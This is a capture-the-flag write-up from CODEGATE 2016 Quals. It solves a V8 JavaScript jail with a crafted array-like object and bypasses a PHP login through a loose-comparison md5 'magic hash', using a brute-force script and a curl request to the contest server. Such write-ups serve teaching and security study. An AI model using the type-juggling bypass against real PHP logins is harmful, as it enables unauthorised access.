CODEGATE 2016 Quals - Writeup
i participated in CODEGATE 2016 Quals as a member of Ping-Mic.
solved:
- JS_is_not_a_jail (misc100)
helped to solve:
- Combination Pizza (web222)
JS_is_not_a_jail
First, i checked challenge100
function.
[JavaScript Jail] let start to type on 'challenge100' V8 version 5.1.0 (candidate) d8> challenge100 function (arr) { var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6"; var check = "20150303"; if((arr === null || arr === undefined)) { print("arr is null or undefined."); return; } if(!arr.hasOwnProperty('length')) { print("length property is null or undefined."); return; } if(arr.length >= 0) { print("i think you're not geek. From now on, a GEEK Only!"); return; } if(Object.getPrototypeOf(arr) !== Array.prototype) { print("Oh.... can you give me an array?"); return; } var length = check.length; for(var i=0;i<length;i++) { arr[i] = random_value[Math.floor(Math.random() * random_value.length)]; } for(i=0;i<length;i++) { if(arr[i] !== check[i]) { print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)"); return; } } print("Yay!!"); print(flag); } d8>
Next, I made class MyArray
. It has length
propaty which returns -1
, and its value cannot be re-write.
To prohibit re-write value, i used Object.defineProperty().
MyArray = function (){ this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; var _arr = MyArray(); console.log(Object.getOwnPropertyNames(_arr)); for(var i = 0; i <= 7; i+=1){ _arr = Object.defineProperty(_arr, i.toString(10), { writable: false }); } console.log(_arr.length); challenge100(_arr); function challenge100 (arr) { var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6"; var check = "20150303"; var print = console.log; var flag = "test_flag{this is test}"; if((arr === null || arr === undefined)) { print("arr is null or undefined."); return; } if(!arr.hasOwnProperty('length')) { print("length property is null or undefined."); return; } if(arr.length >= 0) { print("i think you're not geek. From now on, a GEEK Only!"); return; } if(Object.getPrototypeOf(arr) !== Array.prototype) { print("Oh.... can you give me an array?"); return; } var length = check.length; for(var i=0;i<length;i++) { arr[i] = random_value[Math.floor(Math.random() * random_value.length)]; } console.log(arr); for(i=0;i<length;i++) { if(arr[i] !== check[i]) { print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)"); return; } } print("Yay!!"); print(flag); }
Third, i ran this code locally to see if it works. node
is good for debugging environment.
Finally, i formatted this code, and pasted to JavaScript Jail.
MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; var _arr = MyArray(); console.log(Object.getOwnPropertyNames(_arr)); for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
$ nc 175.119.158.131 1129 [JavaScript Jail] let start to type on 'challenge100' V8 version 5.1.0 (candidate) d8> MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; var _arr = MyArray(); console.log(Object.getOwnPropertyNames(_arr)); for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });} challenge100(_arr);MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; } d8> var _arr = MyArray(); undefined d8> console.log(Object.getOwnPropertyNames(_arr)); (d8):1: ReferenceError: console is not defined console.log(Object.getOwnPropertyNames(_arr)); ^ ReferenceError: console is not defined at (d8):1:1 d8> for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });} [] d8> challenge100(_arr);challenge100(_arr); Yay!! flag is "easy xD, get a more hardest challenge!" undefined
Combination Pizza
This is _login_ck.php
:
<?php include "./lib/for_flag.php"; include "./lib/lib.php"; $user = mysql_real_escape_string($_POST['user']); $pass = mysql_real_escape_string($_POST['pass']); $token = $_POST['token']; $que = "select user from login where user='{$user}' and pass=md5('{$pass}')"; $result = mysql_query($que); $row = mysql_fetch_array($result); if($row['user'] == 'Admin') { if(md5("blog".$token) == '0e689047178306969035064392896674') { echo "good job !!!<br />FLAG : <b>".$flag."</b>"; } else { echo "Incorrect Token"; } } else { echo "Incorrect ID or Password"; } ?>
i noticed that md5("blog".$token) == '0e689047178306969035064392896674'
should be 0 == 0
(numeric compare) in a cirtain $token
.
@mrtc0 found this post:
PHP: md5('240610708') == md5('QNKCDZO') | Hacker News
So i ran this php script:
<?php $test = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "p", "Q", "R", "S", "T", "U"]; for($i = 0, $len = count($test); $i < $len; $i += 1){ for($j = 0, $len = count($test); $j < $len; $j += 1){ for($k = 0, $len = count($test); $k < $len; $k += 1){ for($l = 0, $len = count($test); $l < $len; $l += 1){ for($m = 0, $len = count($test); $m < $len; $m += 1){ $token = "\n" . $test[$i] . $test[$j] . $test[$k] . $test[$l] . $test[$m]; if(md5("blog".$token) == '0e689047178306969035064392896674'){ echo "\$token = " . urlencode($token) . "\n => " . md5("blog".$token) . "\n"; } } } } } }
$ php ./web222_n.php $token = %0AtDMwy => 0e163908937933900237353340463810
Good!! $token = "%0AtDMwy"
gives me the flag:
curl http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/login_ck.php -d "user=Admin" -d "pass=adminpw" -d 'token=%0AtDMwy' good job !!!<br />FLAG : <b>jjambbong_WEBHACKING!!@!</b